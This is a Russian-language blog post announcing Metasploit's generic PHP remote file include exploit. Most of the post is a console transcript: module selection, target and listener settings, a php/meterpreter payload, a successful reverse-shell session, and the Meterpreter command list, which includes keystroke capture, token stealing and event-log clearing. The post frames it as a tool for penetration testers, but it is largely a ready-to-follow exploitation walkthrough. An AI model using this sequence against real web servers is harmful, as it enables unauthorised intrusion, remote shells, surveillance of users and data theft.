Unless otherwise stated, all articles/files on this website are licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Unported License.
Crime on the wire
Обновляйте свои метасплойты, если вы этого ещё не сделали. Metasploit расширяет свои горизонты и теперь предоставляет консоль для управления скомпрометированными серверами. А именно, позволяет эксплуатировать уязвимости типа RFI.
Оригинальный источник: http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html.
В принципе, нечего тут много писать, скажу, что работает примерно так:
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 9392
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/Ams/msf33/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 262144
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /msf.php?path=XXpathXX
PHPURI => /msf.php?path=XXpathXX
msf exploit(php_include) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_include) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(php_include) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_php normal PHP Command Shell, Bind TCP (via php)
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter normal PHP Meterpreter
php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
php/shell_findsock normal PHP Command Shell, Find Port
msf exploit(php_include) > set PAYLOAD php/meterpreter
PAYLOAD => php/meterpreter
msf exploit(php_include) > set SRVPORT 8082
SRVPORT => 8082
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 9392
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/Ams/msf33/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /msf.php?path=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 127.0.0.1 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8082 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 262144
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Using URL: http://0.0.0.0:8082/HKDlBDt
[*] Local IP: http://192.168.0.2:8082/HKDlBDt
[*] PHP include server started.
[*] Sending /msf.php?path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%32%3a%38%30%38%32%2f%48%4b%44%6c%42%44%74%3f
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:42087) at Tue Jun 15 03:45:04 +0300 2010
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
meterpreter >
meterpreter > sysinfo
Computer: pinguin
OS : Linux pinguin 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686
meterpreter > getuid
Server username: apache (80)
Если не указывать PHPURI, то метасплойт будет перебирать пути из своей базы RFI. Данную базу собирал RSnake.
В очередной раз Metasploit приходит в веб, упрощая работу пентестерам и не только :)
теги: Metasploit, PHP, RFI | показов: 1059
